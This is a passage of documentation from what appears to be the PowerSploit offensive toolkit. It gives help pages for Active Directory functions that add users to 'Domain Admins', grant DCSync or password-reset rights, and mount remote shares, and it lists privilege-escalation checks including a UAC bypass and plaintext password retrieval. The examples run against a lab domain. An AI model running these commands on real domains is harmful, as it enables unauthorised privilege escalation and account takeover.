DLL\n    \n### Registry Checks:\n    Get-RegistryAlwaysInstallElevated   -   checks if the AlwaysInstallElevated registry key is set\n    Get-RegistryAutoLogon               -   checks for Autologon credentials in the registry\n    Get-ModifiableRegistryAutoRun       -   checks for any modifiable binaries/scripts (or their configs) in HKLM autoruns\n\n### Miscellaneous Checks:\n    Get-ModifiableScheduledTaskFile     -   find schtasks with modifiable target files\n    Get-UnattendedInstallFile           -   finds remaining unattended installation files\n    Get-Webconfig                       -   checks for any encrypted web.config strings\n    Get-ApplicationHost                 -   checks for encrypted application pool and virtual directory passwords\n    Get-SiteListPassword                -   retrieves the plaintext passwords for any found McAfee's SiteList.xml files\n    Get-CachedGPPPassword               -   checks for passwords in cached Group Policy Preferences files\n\n### Other Helpers/Meta-Functions:\n    Get-ModifiablePath                  -   tokenizes an input string and returns the files in it the current user can modify\n    Write-UserAddMSI                    -   write out a MSI installer that prompts for a user to be added\n    Invoke-WScriptUACBypass             -   performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe\n    Invoke-PrivescAudit                 -   runs all current escalation checks and returns a report (formerly Invoke-AllChecks)\n"
  },
  {
    "path": "docs/Recon/Add-DomainGroupMember.md",
    "content": "# Add-DomainGroupMember\r\n\r\n## SYNOPSIS\r\nAdds a domain user (or group) to an existing domain group, assuming\r\nappropriate permissions to do so.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-PrincipalContext\r\n\r\n## SYNTAX\r\n\r\n```\r\nAdd-DomainGroupMember [-Identity] <String> -Members <String[]> [-Domain <String>] [-Credential <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nFirst binds to the specified domain context using Get-PrincipalContext.\r\nThe bound domain context is then used to search for the specified -GroupIdentity,\r\nwhich returns a DirectoryServices.AccountManagement.GroupPrincipal object.\r\nFor\r\neach entry in -Members, each member identity is similarly searched for and added\r\nto the group.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y'\r\n```\r\n\r\nAdds harmj0y to 'Domain Admins' in the current domain.\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nAdd-DomainGroupMember -Identity 'Domain Admins' -Members 'harmj0y' -Credential $Cred\r\n\r\nAdds harmj0y to 'Domain Admins' in the current domain using the alternate credentials.\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\n$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\nNew-DomainUser -SamAccountName andy -AccountPassword $UserPassword -Credential $Cred | Add-DomainGroupMember 'Domain Admins' -Credential $Cred\r\n\r\nCreates the 'andy' user with the specified description and password, using the specified\r\nalternate credentials, and adds the user to 'domain admins' using Add-DomainGroupMember\r\nand the alternate credentials.\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nA group SamAccountName (e.g.\r\nGroup1), DistinguishedName (e.g.\r\nCN=group1,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1114), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d202)\r\nspecifying the group to add members to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: GroupName, GroupIdentity\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Members\r\nOne or more member identities, i.e.\r\nSamAccountName (e.g.\r\nGroup1), DistinguishedName\r\n(e.g.\r\nCN=group1,CN=Users,DC=testlab,DC=local), SID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1114),\r\nor GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d202).\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: MemberIdentity, Member, DistinguishedName\r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use to search for user/group principals, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/](http://richardspowershellblog.wordpress.com/2008/05/25/system-directoryservices-accountmanagement/)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Add-DomainObjectAcl.md",
    "content": "# Add-DomainObjectAcl\r\n\r\n## SYNOPSIS\r\nAdds an ACL for a specific active directory object.\r\n\r\nAdminSDHolder ACL approach from Sean Metcalf (@pyrotek3): https://adsecurity.org/?p=1906\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Get-DomainObject\r\n\r\n## SYNTAX\r\n\r\n```\r\nAdd-DomainObjectAcl [[-TargetIdentity] <String[]>] [-TargetDomain <String>] [-TargetLDAPFilter <String>]\r\n [-TargetSearchBase <String>] -PrincipalIdentity <String[]> [-PrincipalDomain <String>] [-Server <String>]\r\n [-SearchScope <String>] [-ResultPageSize <Int32>] [-ServerTimeLimit <Int32>] [-Tombstone]\r\n [-Credential <PSCredential>] [-Rights <String>] [-RightsGUID <Guid>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function modifies the ACL/ACE entries for a given Active Directory\r\ntarget object specified by -TargetIdentity.\r\nAvailable -Rights are\r\n'All', 'ResetPassword', 'WriteMembers', 'DCSync', or a manual extended\r\nrights GUID can be set with -RightsGUID.\r\nThese rights are granted on the target\r\nobject for the specified -PrincipalIdentity.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid\r\n```\r\n\r\nGet-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}\r\n\r\n...\r\n\r\nAdd-DomainObjectAcl -TargetIdentity dfm.a -PrincipalIdentity harmj0y -Rights ResetPassword -Verbose\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(samAccountName=harmj0y)))\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string:(&(|(samAccountName=dfm.a)))\r\nVERBOSE: \\[Add-DomainObjectAcl\\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=dfm (admin),CN=Users,DC=testlab,DC=local\r\nVERBOSE: \\[Add-DomainObjectAcl\\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=dfm (admin),CN=Users,DC=testlab,DC=local\r\n\r\nGet-DomainObjectACL dfm.a -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }\r\n\r\nAceQualifier           : AccessAllowed\r\nObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local\r\nActiveDirectoryRights  : ExtendedRight\r\nObjectAceType          : User-Force-Change-Password\r\nObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114\r\nInheritanceFlags       : None\r\nBinaryLength           : 56\r\nAceType                : AccessAllowedObject\r\nObjectAceFlags         : ObjectAceTypePresent\r\nIsCallback             : False\r\nPropagationFlags       : None\r\nSecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108\r\nAccessMask             : 256\r\nAuditFlags             : None\r\nIsInherited            : False\r\nAceFlags               : None\r\nInheritedObjectAceType : All\r\nOpaqueLength           : 0\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$Harmj0ySid = Get-DomainUser harmj0y | Select-Object -ExpandProperty objectsid\r\n```\r\n\r\nGet-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid}\r\n\r\n\\[no results returned\\]\r\n\r\n$SecPassword = ConvertTo-SecureString 'Password123!'-AsPlainText -Force\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nAdd-DomainObjectAcl -TargetIdentity testuser -PrincipalIdentity harmj0y -Rights ResetPassword -Credential $Cred -Verbose\r\nVERBOSE: \\[Get-Domain\\] Using alternate credentials for Get-Domain\r\nVERBOSE: \\[Get-Domain\\] Extracted domain 'TESTLAB' from -Credential\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainSearcher\\] Using alternate credentials for LDAP connection\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(|(samAccountName=harmj0y)(name=harmj0y))))\r\nVERBOSE: \\[Get-Domain\\] Using alternate credentials for Get-Domain\r\nVERBOSE: \\[Get-Domain\\] Extracted domain 'TESTLAB' from -Credential\r\nVERBOSE: \\[Get-DomainSearcher\\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local\r\nVERBOSE: \\[Get-DomainSearcher\\] Using alternate credentials for LDAP connection\r\nVERBOSE: \\[Get-DomainObject\\] Get-DomainObject filter string: (&(|(|(samAccountName=testuser)(name=testuser))))\r\nVERBOSE: \\[Add-DomainObjectAcl\\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local 'ResetPassword' on CN=testuser testuser,CN=Users,DC=testlab,DC=local\r\nVERBOSE: \\[Add-DomainObjectAcl\\] Granting principal CN=harmj0y,CN=Users,DC=testlab,DC=local rights GUID '00299570-246d-11d0-a768-00aa006e0529' on CN=testuser,CN=Users,DC=testlab,DC=local\r\n\r\nGet-DomainObjectACL testuser -ResolveGUIDs | Where-Object {$_.securityidentifier -eq $Harmj0ySid }\r\n\r\nAceQualifier           : AccessAllowed\r\nObjectDN               : CN=dfm (admin),CN=Users,DC=testlab,DC=local\r\nActiveDirectoryRights  : ExtendedRight\r\nObjectAceType          : User-Force-Change-Password\r\nObjectSID              : S-1-5-21-890171859-3433809279-3366196753-1114\r\nInheritanceFlags       : None\r\nBinaryLength           : 56\r\nAceType                : AccessAllowedObject\r\nObjectAceFlags         : ObjectAceTypePresent\r\nIsCallback             : False\r\nPropagationFlags       : None\r\nSecurityIdentifier     : S-1-5-21-890171859-3433809279-3366196753-1108\r\nAccessMask             : 256\r\nAuditFlags             : None\r\nIsInherited            : False\r\nAceFlags               : None\r\nInheritedObjectAceType : All\r\nOpaqueLength           : 0\r\n\r\n## PARAMETERS\r\n\r\n### -TargetIdentity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\r\nfor the domain object to modify ACLs for.\r\nRequired.\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: DistinguishedName, SamAccountName, Name\r\n\r\nRequired: False\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -TargetDomain\r\nSpecifies the domain for the TargetIdentity to use for the modification, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -TargetLDAPFilter\r\nSpecifies an LDAP query string that is used to filter Active Directory object targets.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: Filter\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -TargetSearchBase\r\nThe LDAP source to search through for targets, e.g.\r\n\"LDAP://OU=secret,DC=testlab,DC=local\"\r\nUseful for OU queries.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PrincipalIdentity\r\nA SamAccountName (e.g.\r\nharmj0y), DistinguishedName (e.g.\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local),\r\nSID (e.g.\r\nS-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g.\r\n4c435dd7-dc58-4b14-9a5e-1fdb0e80d201)\r\nfor the domain principal to add for the ACL.\r\nRequired.\r\nWildcards accepted.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -PrincipalDomain\r\nSpecifies the domain for the TargetIdentity to use for the principal, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -SearchScope\r\nSpecifies the scope to search under, Base/OneLevel/Subtree (default of Subtree).\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: Subtree\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ResultPageSize\r\nSpecifies the PageSize to set for the LDAP searcher object.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 200\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -ServerTimeLimit\r\nSpecifies the maximum amount of time the server spends searching.\r\nDefault of 120 seconds.\r\n\r\n```yaml\r\nType: Int32\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: 0\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Tombstone\r\nSwitch.\r\nSpecifies that the searcher should also return deleted/tombstoned objects.\r\n\r\n```yaml\r\nType: SwitchParameter\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: False\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the target domain.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Rights\r\nRights to add for the principal, 'All', 'ResetPassword', 'WriteMembers', 'DCSync'.\r\nDefaults to 'All'.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: All\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -RightsGUID\r\nManual GUID representing the right to add to the target.\r\n\r\n```yaml\r\nType: Guid\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[https://adsecurity.org/?p=1906\r\nhttps://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell](https://adsecurity.org/?p=1906\r\nhttps://social.technet.microsoft.com/Forums/windowsserver/en-US/df3bfd33-c070-4a9c-be98-c4da6e591a0a/forum-faq-using-powershell-to-assign-permissions-on-active-directory-objects?forum=winserverpowershell)\r\n\r\n"
  },
  {
    "path": "docs/Recon/Add-RemoteConnection.md",
    "content": "# Add-RemoteConnection\r\n\r\n## SYNOPSIS\r\nPseudo \"mounts\" a connection to a remote path using the specified\r\ncredential object, allowing for access of remote resources.\r\nIf a -Path isn't\r\nspecified, a -ComputerName is required to pseudo-mount IPC$.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: PSReflect\r\n\r\n## SYNTAX\r\n\r\n### ComputerName (Default)\r\n```\r\nAdd-RemoteConnection [-ComputerName] <String[]> -Credential <PSCredential>\r\n```\r\n\r\n### Path\r\n```\r\nAdd-RemoteConnection [-Path] <String[]> -Credential <PSCredential>\r\n```\r\n\r\n## DESCRIPTION\r\nThis function uses WNetAddConnection2W to make a 'temporary' (i.e.\r\nnot saved) connection\r\nto the specified remote -Path (\\\\\\\\UNC\\share) with the alternate credentials specified in the\r\n-Credential object.\r\nIf a -Path isn't specified, a -ComputerName is required to pseudo-mount IPC$.\r\n\r\nTo destroy the connection, use Remove-RemoteConnection with the same specified \\\\\\\\UNC\\share path\r\nor -ComputerName.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\n$Cred = Get-Credential\r\n```\r\n\r\nAdd-RemoteConnection -ComputerName 'PRIMARY.testlab.local' -Credential $Cred\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm.a', $SecPassword)\r\nAdd-RemoteConnection -Path '\\\\\\\\PRIMARY.testlab.local\\C$\\' -Credential $Cred\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$Cred = Get-Credential\r\n```\r\n\r\n@('PRIMARY.testlab.local','SECONDARY.testlab.local') | Add-RemoteConnection  -Credential $Cred\r\n\r\n## PARAMETERS\r\n\r\n### -ComputerName\r\nSpecifies the system to add a \\\\\\\\ComputerName\\IPC$ connection for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: ComputerName\r\nAliases: HostName, dnshostname, name\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Path\r\nSpecifies the remote \\\\\\\\UNC\\path to add the connection for.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: Path\r\nAliases: \r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nA \\[Management.Automation.PSCredential\\] object of alternate credentials\r\nfor connection to the remote system.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: True\r\nPosition: Named\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n## OUTPUTS\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n"
  },
  {
    "path": "docs/Recon/Convert-ADName.md",
    "content": "# Convert-ADName\r\n\r\n## SYNOPSIS\r\nConverts Active Directory object names between a variety of formats.\r\n\r\nAuthor: Bill Stewart, Pasquale Lantella  \r\nModifications: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: None\r\n\r\n## SYNTAX\r\n\r\n```\r\nConvert-ADName [-Identity] <String[]> [[-OutputType] <String>] [[-Domain] <String>] [[-Server] <String>]\r\n [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nThis function is heavily based on Bill Stewart's code and Pasquale Lantella's code (in LINK)\r\nand translates Active Directory names between various formats using the NameTranslate COM object.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nConvert-ADName -Identity \"TESTLAB\\harmj0y\"\r\n```\r\n\r\nharmj0y@testlab.local\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n\"TESTLAB\\krbtgt\", \"CN=Administrator,CN=Users,DC=testlab,DC=local\" | Convert-ADName -OutputType Canonical\r\n```\r\n\r\ntestlab.local/Users/krbtgt\r\ntestlab.local/Users/Administrator\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\nConvert-ADName -OutputType dn -Identity 'TESTLAB\\harmj0y' -Server PRIMARY.testlab.local\r\n```\r\n\r\nCN=harmj0y,CN=Users,DC=testlab,DC=local\r\n\r\n### -------------------------- EXAMPLE 4 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm', $SecPassword)\r\n'S-1-5-21-890171859-3433809279-3366196753-1108' | Convert-ADNAme -Credential $Cred\r\n\r\nTESTLAB\\harmj0y\r\n\r\n## PARAMETERS\r\n\r\n### -Identity\r\nSpecifies the Active Directory object name to translate, of the following form:\r\n\r\n    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'\r\n    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'\r\n    NT4               domain\\username; e.g., 'fabrikam\\pflynn'\r\n    Display           display name, e.g.\r\n'pflynn'\r\n    DomainSimple      simple domain name format, e.g.\r\n'pflynn@fabrikam.com'\r\n    EnterpriseSimple  simple enterprise name format, e.g.\r\n'pflynn@fabrikam.com'\r\n    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'\r\n    UPN               user principal name; e.g., 'pflynn@fabrikam.com'\r\n    CanonicalEx       extended canonical name format\r\n    SPN               service principal name format; e.g.\r\n'HTTP/kairomac.contoso.com'\r\n    SID               Security Identifier; e.g., 'S-1-5-21-12986231-600641547-709122288-57999'\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: Name, ObjectName\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -OutputType\r\nSpecifies the output name type you want to convert to, which must be one of the following:\r\n\r\n    DN                short for 'distinguished name'; e.g., 'CN=Phineas Flynn,OU=Engineers,DC=fabrikam,DC=com'\r\n    Canonical         canonical name; e.g., 'fabrikam.com/Engineers/Phineas Flynn'\r\n    NT4               domain\\username; e.g., 'fabrikam\\pflynn'\r\n    Display           display name, e.g.\r\n'pflynn'\r\n    DomainSimple      simple domain name format, e.g.\r\n'pflynn@fabrikam.com'\r\n    EnterpriseSimple  simple enterprise name format, e.g.\r\n'pflynn@fabrikam.com'\r\n    GUID              GUID; e.g., '{95ee9fff-3436-11d1-b2b0-d15ae3ac8436}'\r\n    UPN               user principal name; e.g., 'pflynn@fabrikam.com'\r\n    CanonicalEx       extended canonical name format, e.g.\r\n'fabrikam.com/Users/Phineas Flynn'\r\n    SPN               service principal name format; e.g.\r\n'HTTP/kairomac.contoso.com'\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the translation, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to for the translation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nSpecifies an alternate credential to use for the translation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 5\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nAccepts one or more objects name strings on the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n### String\r\n\r\nOutputs a string representing the converted name.\r\n\r\n## NOTES\r\n\r\n## RELATED LINKS\r\n\r\n[http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats\r\nhttps://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67](http://windowsitpro.com/active-directory/translating-active-directory-object-names-between-formats\r\nhttps://gallery.technet.microsoft.com/scriptcenter/Translating-Active-5c80dd67)\r\n\r\n"
  },
  {
    "path": "docs/Recon/ConvertFrom-SID.md",
    "content": "# ConvertFrom-SID\r\n\r\n## SYNOPSIS\r\nConverts a security identifier (SID) to a group/user name.\r\n\r\nAuthor: Will Schroeder (@harmj0y)  \r\nLicense: BSD 3-Clause  \r\nRequired Dependencies: Convert-ADName\r\n\r\n## SYNTAX\r\n\r\n```\r\nConvertFrom-SID [-ObjectSid] <String[]> [[-Domain] <String>] [[-Server] <String>]\r\n [[-Credential] <PSCredential>]\r\n```\r\n\r\n## DESCRIPTION\r\nConverts a security identifier string (SID) to a group/user name\r\nusing Convert-ADName.\r\n\r\n## EXAMPLES\r\n\r\n### -------------------------- EXAMPLE 1 --------------------------\r\n```\r\nConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108\r\n```\r\n\r\nTESTLAB\\harmj0y\r\n\r\n### -------------------------- EXAMPLE 2 --------------------------\r\n```\r\n\"S-1-5-21-890171859-3433809279-3366196753-1107\", \"S-1-5-21-890171859-3433809279-3366196753-1108\", \"S-1-5-32-562\" | ConvertFrom-SID\r\n```\r\n\r\nTESTLAB\\WINDOWS2$\r\nTESTLAB\\harmj0y\r\nBUILTIN\\Distributed COM Users\r\n\r\n### -------------------------- EXAMPLE 3 --------------------------\r\n```\r\n$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force\r\n```\r\n\r\n$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\\dfm', $SecPassword)\r\nConvertFrom-SID S-1-5-21-890171859-3433809279-3366196753-1108 -Credential $Cred\r\n\r\nTESTLAB\\harmj0y\r\n\r\n## PARAMETERS\r\n\r\n### -ObjectSid\r\nSpecifies one or more SIDs to convert.\r\n\r\n```yaml\r\nType: String[]\r\nParameter Sets: (All)\r\nAliases: SID\r\n\r\nRequired: True\r\nPosition: 1\r\nDefault value: None\r\nAccept pipeline input: True (ByPropertyName, ByValue)\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Domain\r\nSpecifies the domain to use for the translation, defaults to the current domain.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 2\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Server\r\nSpecifies an Active Directory server (domain controller) to bind to for the translation.\r\n\r\n```yaml\r\nType: String\r\nParameter Sets: (All)\r\nAliases: DomainController\r\n\r\nRequired: False\r\nPosition: 3\r\nDefault value: None\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n### -Credential\r\nSpecifies an alternate credential to use for the translation.\r\n\r\n```yaml\r\nType: PSCredential\r\nParameter Sets: (All)\r\nAliases: \r\n\r\nRequired: False\r\nPosition: 4\r\nDefault value: [Management.Automation.PSCredential]::Empty\r\nAccept pipeline input: False\r\nAccept wildcard characters: False\r\n```\r\n\r\n## INPUTS\r\n\r\n### String\r\n\r\nAccepts one or more SID strings on the pipeline.\r\n\r\n## OUTPUTS\r\n\r\n### String\r\n\r\nThe converted DOMAIN\\username.\r\n\r\n## NOTES\r\n\r\n## 